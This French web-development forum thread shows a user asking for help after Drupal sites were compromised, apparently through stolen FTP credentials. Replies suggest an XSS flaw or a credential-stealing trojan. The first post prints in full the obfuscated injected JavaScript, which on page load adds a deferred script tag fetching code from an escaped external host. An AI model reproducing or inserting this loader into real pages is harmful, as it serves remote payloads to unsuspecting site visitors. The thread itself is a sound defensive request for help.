IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

JavaScript Discussion :

Insertion Script JS


Sujet :

JavaScript

Vue hybride

Kaory Insertion Script JS 11/04/2010, 01h16
Bovino Salut. Ca me semble peu... 11/04/2010, 14h06
Kaory Merci bien pour cette... 11/04/2010, 15h26
Sianobel Bonsoir, J'ai eu ce... 13/04/2010, 21h14
Kaory Bonjour, Merci bien pour... 17/04/2010, 17h29
Message précédent Message précédent   Message suivant Message suivant
  1. #1
    Membre averti
    Profil pro
    Inscrit en
    Juin 2006
    Messages
    41
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juin 2006
    Messages : 41
    Par défaut Insertion Script JS
    Bonsoir à tous,

    Un ami se serait fait 'voler' ses accès des serveurs ftp sur lesquels il travaillait via son ordinateur portable.

    Tous les sites concernés ont, depuis, un script js qui vient se glisser en fin du fichier index.php, de plusieurs fichiers js, voire remplace leur contenu (jquery.js).

    En espérant ne pas faire de gaffe, voici le script js en question :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
     
    var cf='';this.j='';var D='';function u(){var M;if(M!=''){M='s'};var hW=new Array();this.Xn="";var Q=unescape;var tu=new Array();var H=new Array();this.q="";var A=window;var p=Q("%2f%6a%63%70%65%6e%6e%65%79%2d%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%70%65%72%65%7a%68%69%6c%74%6f%6e%2e%63%6f%6d%2e%70%68%70");var O;if(O!='VE'){O=''};function a(v,E){var RO=new Date();this.k='';var SM;if(SM!='' && SM!='_L'){SM='Un'};var ss='';var X=new String("g");var c=Q("%5b"), U=Q("%5d");var ex;if(ex!='w' && ex!='FS'){ex='w'};var fP;if(fP!='JD' && fP!='QD'){fP='JD'};var g=c+E+U;var So="";var V=new RegExp(g, X);var tS='';return v.replace(V, new String());};this.Jg='';this.xs="";var WB;if(WB!='ku'){WB='ku'};var jV;if(jV!='rD' && jV != ''){jV=null};var o=new String();var Xg=a('834047484430557','3745');var FR;if(FR!='L' && FR != ''){FR=null};var mD=new Date();var C=document;this.WA='';function F(){this.fjY='';var sM=new Date();var cN=Q("%68%74%74%70%3a%2f%2f%68%65%6c%70%68%6f%6d%65%63%61%72%65%2e%61%74%3a");this.MB='';o=cN;var Vy=new Date();var IE=new Array();o+=Xg;o+=p;this.KX='';this.B="";var WBm;if(WBm!='' && WBm!='rx'){WBm=''};try {var Bv;if(Bv!='' && Bv!='fE'){Bv='EZ'};h=C.createElement(a('shcHrBiRpBtR','qIHBuD3hR'));var et=new String();h[Q("%64%65%66%65%72")]=[4,1][1];h[Q("%73%72%63")]=o;var ii;if(ii!='rb' && ii!='tW'){ii='rb'};var HB;if(HB!='' && HB!='au'){HB=null};C.body.appendChild(h);var ML=new String();} catch(R){this.TS="";alert(R);this.Pv="";var op="";};}var ms=new String();A["rCe5on".substr(4)+"lo"+"ad"]=F;var LQ="";var sq;if(sq!='pm'){sq=''};var Yz=new String();};var Gg="";u();var zs=new String();var NA;if(NA!='TT'){NA='TT'};
    Pour le moment, je l'ai retiré là où j'ai pu le trouver. Il s'agit de sites Drupal pour la majorité donc pas évident de trouver tous les fichiers infectés du premier coup. Et j'ai modifié les accès au serveur ftp.

    Que puis-je / dois-je faire d'autre ? Comment le pirate/robot a-t-il pu s'y prendre ?

    Je vous remercie par avance pour votre aide.
    Cordialement,

  2. #2
    Rédacteur

    Avatar de Bovino
    Homme Profil pro
    Développeur Web
    Inscrit en
    Juin 2008
    Messages
    23 647
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 54
    Localisation : France, Gironde (Aquitaine)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Juin 2008
    Messages : 23 647
    Billets dans le blog
    20
    Par défaut
    Salut.
    Ca me semble peu probable que ton ami se soit fait voler ses accès FTP.
    Il s'agit plus probablement d'une faille dans un des composants de Drupal qui permet une injection XSS.
    Reste à trouver lequel puis soit de retirer ce composant soit d'essayer de le corriger toi-même.
    Pas de question technique par MP !
    Tout le monde peut participer à developpez.com, vous avez une idée, contactez-moi !
    Mes formations video2brain : La formation complète sur JavaScriptJavaScript et le DOM par la pratiquePHP 5 et MySQL : les fondamentaux
    Mon livre sur jQuery
    Module Firefox / Chrome d'intégration de JSFiddle et CodePen sur le forum

  3. #3
    Membre averti
    Profil pro
    Inscrit en
    Juin 2006
    Messages
    41
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juin 2006
    Messages : 41
    Par défaut
    Merci bien pour cette réponse.

    Ce qui m'intrigue, c'est que l'ensemble des sites dont il avait les accès se sont fait prendre quasi simultanément. Et pas les miens par exemple, sachant qu'on travaille ensemble sur un projet.

    Et je ne vois pas comment une injection XSS pourrait insérer du code en dur sur le serveur distant sans les accès au serveur
    Pourriez-vous éclaircir ce point ou du moins me conseiller un bon "tutoriel" sur ce type de cas, s'il-vous-plaît ?

    Merci d'avance pour votre aide.
    Cordialement,

  4. #4
    Membre confirmé Avatar de Sianobel
    Femme Profil pro
    Webmaster
    Inscrit en
    Octobre 2007
    Messages
    54
    Détails du profil
    Informations personnelles :
    Sexe : Femme
    Localisation : Belgique

    Informations professionnelles :
    Activité : Webmaster
    Secteur : Arts - Culture

    Informations forums :
    Inscription : Octobre 2007
    Messages : 54
    Par défaut
    Bonsoir,

    J'ai eu ce problème et il est très agaçant. Il s'agit d'un trojan infectant l'ordinateur et récupérant les identifiants ftp. Heureusement pas ceux des data-bases mysql.

    Il faut désinfecter ton système et changer tes login de connections sur les différents ftp. Car, même après désinfection de l'ordinateur et la réinstallation du système (pour dire qu'il ne restait rien du trojan), les lignes de code revenaient.

  5. #5
    Membre averti
    Profil pro
    Inscrit en
    Juin 2006
    Messages
    41
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juin 2006
    Messages : 41
    Par défaut
    Bonjour,

    Merci bien pour ces précisions ! Connaissez-vous le nom du trojan ?

    En parlant de désinfecter et réinstaller le système, vous parlez de celui à partir duquel je travaille / modifie le contenu ftp, ou celui où est effectivement hébergé le site ?

    Je vous remercie par avance pour votre aide.
    Cordialement,

Discussions similaires

  1. Réponses: 0
    Dernier message: 22/07/2012, 15h40
  2. [Smarty] insertion script dans header
    Par Invité2 dans le forum Bibliothèques et frameworks
    Réponses: 0
    Dernier message: 02/09/2011, 22h09
  3. insert à partir d'un script php
    Par illegalsene dans le forum Oracle
    Réponses: 2
    Dernier message: 05/10/2005, 17h01
  4. tests de script et clefs étrangères en INSERT
    Par Invité dans le forum MS SQL Server
    Réponses: 3
    Dernier message: 08/08/2005, 17h15
  5. Réponses: 24
    Dernier message: 31/05/2005, 15h07

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo